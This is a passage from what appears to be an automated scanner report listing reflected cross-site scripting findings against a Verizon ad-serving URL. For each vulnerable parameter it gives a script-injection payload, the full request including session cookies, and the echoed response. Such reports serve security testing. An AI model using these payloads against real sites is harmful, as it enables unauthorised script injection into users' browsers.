Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
p/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=46b4c"><script>alert(1)</script>f168f1782af&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&
...[SNIP]...

3.27. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popstate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67eb7"><script>alert(1)</script>25f6305b55d was submitted in the popstate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=67eb7"><script>alert(1)</script>25f6305b55d&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/vzsurround2.net/homepage/L24/1707385016/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=67eb7"><script>alert(1)</script>25f6305b55d&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&
...[SNIP]...

3.28. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popzipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9011"><script>alert(1)</script>883683fd3b3 was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=a9011"><script>alert(1)</script>883683fd3b3&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
.net/homepage/L24/1213504191/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=a9011"><script>alert(1)</script>883683fd3b3&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail
...[SNIP]...

3.29. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [prizm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69473"><script>alert(1)</script>59a6c993841 was submitted in the prizm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=69473"><script>alert(1)</script>59a6c993841&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
A_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=69473"><script>alert(1)</script>59a6c993841&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&we
...[SNIP]...

3.30. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pts parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bff5"><script>alert(1)</script>2291f6d753d was submitted in the pts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=9bff5"><script>alert(1)</script>2291f6d753d&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ndicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=9bff5"><script>alert(1)</script>2291f6d753d&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.31. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pws parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c02f"><script>alert(1)</script>7422fc85b1a was submitted in the pws parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=2c02f"><script>alert(1)</script>7422fc85b1a&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=2c02f"><script>alert(1)</script>7422fc85b1a&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.32. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4daa"><script>alert(1)</script>d5404341735 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=e4daa"><script>alert(1)</script>d5404341735 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
artner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=e4daa"><script>alert(1)</script>d5404341735" target="_top">
...[SNIP]...

3.33. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [sec_email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 577c7"><script>alert(1)</script>7bd9773acc was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=577c7"><script>alert(1)</script>7bd9773acc&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=577c7"><script>alert(1)</script>7bd9773acc&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.34. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_enh_msg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec203"><script>alert(1)</script>f54ed3ebb44 was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=ec203"><script>alert(1)</script>f54ed3ebb44&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
zm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=ec203"><script>alert(1)</script>f54ed3ebb44&webex=&search=" target="_top">
...[SNIP]...

3.35. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_premmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dcbc"><script>alert(1)</script>588a49e61fd was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=7dcbc"><script>alert(1)</script>588a49e61fd&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=7dcbc"><script>alert(1)</script>588a49e61fd&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.36. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [usertype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3855"><script>alert(1)</script>424effc9656 was submitted in the usertype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=e3855"><script>alert(1)</script>424effc9656&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
8_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=e3855"><script>alert(1)</script>424effc9656&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&searc
...[SNIP]...

3.37. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vasonly parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

